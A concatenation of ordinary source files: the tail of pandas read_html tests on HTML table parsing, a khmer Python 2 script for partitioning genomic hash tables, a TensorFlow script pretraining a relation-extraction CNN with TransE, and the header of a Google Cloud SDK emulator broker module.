<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
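            # Minimal file stub: yields its payload once, then empty reads
            # until seek() rewinds it, so the test can observe the rewind.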
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
            # force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
do-partition-stop.py | #! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import khmer
import sys
import threading
import Queue
import gc
import os.path
K = 32
HASHTABLE_SIZE = int(1e9)
N_HT = 4
COUNTING_SIZE = int(1e8)
SUBSET_SIZE = int(1e4)
N_THREADS = 8
ht = None
###
save_ht = False
load_ht = False
save_merged_pmap = True
remove_orig_pmap = True
assert not (save_ht and load_ht) # incompatible
if not save_merged_pmap and remove_orig_pmap:
print '** warning, all the pmap files are going away! no permanent record!'
print ''
###
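# Worker: pull (ht, n, start, stop) tasks off the queue, partition each tag
# subset, and save one .pmap file per subset.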
def worker(q, basename):
while 1:
try:
(ht, n, start, stop) = q.get(False)
except Queue.Empty:
print 'exiting'
return
outfile = basename + '.subset.%d.pmap' % (n,)
if os.path.exists(outfile):
print 'SKIPPING', basename, ' -- already exists'
continue
print 'starting:', basename, n
subset = ht.do_subset_partition(start, stop)
print 'saving:', basename, n
ht.save_subset_partitionmap(subset, outfile)
del subset
gc.collect()
def main(filename):
global ht
basename = os.path.basename(filename)
print 'input file to partition: %s' % filename
print '-- settings:'
print 'K', K
print 'HASHTABLE SIZE %g' % HASHTABLE_SIZE
print 'N HASHTABLES %d' % N_HT
print 'SUBSET SIZE', SUBSET_SIZE
print 'N THREADS', N_THREADS
print '--'
ht = khmer.new_hashbits(K, HASHTABLE_SIZE, N_HT)
# populate the hash table and tag set
if not load_ht:
print 'reading sequences and loading tagset from %s...' % (filename,)
ht.consume_fasta_and_tag(filename)
# save to a file (optional)
if save_ht:
print 'saving...'
ht.save(basename + '.ht')
print 'saving tagset...'
ht.save_tagset(basename + '.tagset')
# calculate the hashtable occupancy
print '---'
print 'hashtable occupancy:', ht.n_occupied() / float(HASHTABLE_SIZE)
print '---'
else:
print 'loading ht %s.ht' % basename
ht.load(basename + '.ht')
print 'loading tagset %s.tagset...' % basename
ht.load_tagset(basename + '.tagset')
###
counting = khmer.new_counting_hash(K, COUNTING_SIZE, N_HT)
ht.traverse_from_tags(counting, 40, 2000, 5)
print 'saving stoptags binary'
ht.save_stop_tags(basename + '.stoptags')
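    # Early exit: the traversal-based stoptags above are the end product here;
    # the abundance/partition code below is currently disabled.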
sys.exit(0)
#
x = counting.abundance_distribution(filename)
fp = open(basename + '.tabund', 'w')
for i, n in enumerate(x):
if n:
print >>fp, i, n
fp.close()
print 'converting to stoptags'
ht.hitraverse_to_stoptags(filename, counting, 5)
print 'saving stoptags binary'
ht.save_stop_tags(basename + '.stoptags')
print 'saving stoptags text'
ht.print_stop_tags(basename + '.stoptags.txt')
print 'eliminating counting hash'
del counting
gc.collect()
sys.exit(0)
###
# divide the tags up into subsets
print 'divvying up tags'
divvy = ht.divide_tags_into_subsets(SUBSET_SIZE)
n_subsets = len(divvy)
divvy.append(0)
# build a queue of tasks:
worker_q = Queue.Queue()
for i in range(0, n_subsets):
start = divvy[i]
end = divvy[i + 1]
worker_q.put((ht, i, start, end))
print 'enqueued %d subset tasks' % n_subsets
open('%s.info' % basename, 'w').write('%d subsets total\n' % (n_subsets))
threads = []
for n in range(N_THREADS):
t = threading.Thread(target=worker, args=(worker_q, basename))
threads.append(t)
t.start()
print 'started threads'
# wait for threads
for t in threads:
t.join()
print 'done making subsets! see %s.subset.*.pmap' % (basename,)
###
print 'erasing old ht, creating new'
del ht
gc.collect()
# create a new, empty ht object for merging; K matters, but not
# hashtable size.
ht = khmer.new_hashbits(K, 1, 1)
# load & merge all pmap files
for i in range(0, n_subsets):
pmap_file = basename + '.subset.%d.pmap' % (i,)
print 'loading', pmap_file
ht.merge_subset_from_disk(pmap_file)
# save merged partitionmap
if save_merged_pmap:
print 'saving merged pmap to %s.pmap.merged' % basename
ht.save_partitionmap(basename + '.pmap.merged')
if remove_orig_pmap:
print 'removing subset pmap files'
for i in range(0, n_subsets):
pmap_file = basename + '.subset.%d.pmap' % (i,)
os.unlink(pmap_file)
# output partitions!
n_partitions = ht.output_partitions(filename, basename + '.part')
print 'output partitions:', n_partitions
(n_partitions, n_singletons) = ht.count_partitions()
print 'pmap partitions:', n_partitions
print 'singletons:', n_singletons
if __name__ == '__main__':
main(sys.argv[1])
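# The thread/Queue task farm used by worker() above, reduced to a minimal
# self-contained sketch (Python 2; 'tasks' and process() are placeholders,
# not part of this script):
#
#     import Queue
#     import threading
#
#     def worker(q):
#         while 1:
#             try:
#                 item = q.get(False)      # non-blocking get, as above
#             except Queue.Empty:
#                 return                   # queue drained -> thread exits
#             process(item)
#
#     q = Queue.Queue()
#     for task in tasks:
#         q.put(task)
#     threads = [threading.Thread(target=worker, args=(q,)) for _ in range(4)]
#     for t in threads:
#         t.start()
#     for t in threads:
#         t.join()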
|
train_ug_pretrain.py | import tensorflow as tf
import numpy as np
import time
import datetime
import os
import network_pretrain as network_pre  # pretraining network for random division
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../biomedical_part1/"
export_path_g = "../biomedical_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'number of KG mini-batches per training round')
tf.app.flags.DEFINE_float('margin',1.0,'margin of the TransE loss')
tf.app.flags.DEFINE_float('learning_rate_kg',0.05,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 87,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 87,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 100,'hidden feature size')
#tf.app.flags.DEFINE_integer('hidden_size', 200,'hidden feature size')#for svd.
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch_pre', 50,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('batch_size',50,'batch size for sentence-level training')
tf.app.flags.DEFINE_float('learning_rate',0.02,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir', './model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple0.npy')
instance_scope = np.load(export_path + 'train_instance_scope0.npy')
instance_scope_path = np.load(export_path_g + 'train_instance_scope_kg0.npy')
instance_scope_path3 = np.load(export_path_g + 'train_instance_scope_tx0.npy')
instance_scope_path4 = np.load(export_path_g + 'train_instance_scope_ug0.npy')
train_len = np.load(export_path + 'train_len0.npy')
train_label = np.load(export_path + 'train_label0.npy')
train_word = np.load(export_path + 'train_word0.npy')
train_pos1 = np.load(export_path + 'train_pos10.npy')
train_pos2 = np.load(export_path + 'train_pos20.npy')
train_word_cross = np.load(export_path_g + 'train_word_cross0.npy')
train_pos1_cross = np.load(export_path_g + 'train_pos1_cross0.npy')
train_pos2_cross = np.load(export_path_g + 'train_pos2_cross0.npy')
train_word_cross3 = np.load(export_path_g + 'train_word_cross_tx0.npy')
train_pos1_cross3 = np.load(export_path_g + 'train_pos1_cross_tx0.npy')
train_pos2_cross3 = np.load(export_path_g + 'train_pos2_cross_tx0.npy')
train_word_cross4 = np.load(export_path_g + 'train_word_cross_ug0.npy')
train_pos1_cross4 = np.load(export_path_g + 'train_pos1_cross_ug0.npy')
train_pos2_cross4 = np.load(export_path_g + 'train_pos2_cross_ug0.npy')
train_mask = np.load(export_path + 'train_mask0.npy')
train_head = np.load(export_path + 'train_head0.npy')
train_tail = np.load(export_path + 'train_tail0.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
print 'building finished'
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
#while True:
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(FLAGS.max_epoch_pre))
#path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(one_epoch + 1))
print 'have saved model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run()
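# The coordinator wiring in main(), in isolation: a minimal sketch of how
# tf.train.Coordinator lets one thread stop its peers (function names here
# are illustrative, not part of this script):
#
#     import threading
#     import tensorflow as tf
#
#     def kg_loop(coord):
#         while not coord.should_stop():   # spins until a peer requests stop
#             pass                         # one KG batch per iteration
#
#     def nn_loop(coord):
#         for _ in range(10):              # finite training schedule
#             pass
#         coord.request_stop()             # tells kg_loop to exit
#
#     coord = tf.train.Coordinator()
#     threads = [threading.Thread(target=kg_loop, args=(coord,)),
#                threading.Thread(target=nn_loop, args=(coord,))]
#     for t in threads:
#         t.start()
#     coord.join(threads)                  # waits for both to finish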
|
broker.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for controlling instances of cloud-testenv-broker processes."""
import errno
import httplib
import json
import os
import os.path
import socket
import subprocess
import threading
import time
import urllib
from googlecloudsdk.api_lib.emulators import util
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import execution_utils
from googlecloudsdk.core import log
from googlecloudsdk.core.util import platforms
import httplib2
class BrokerError(exceptions.ToolException):
"""All errors raised by this module subclass BrokerError."""
pass
class BrokerNotRunningError(BrokerError):
pass
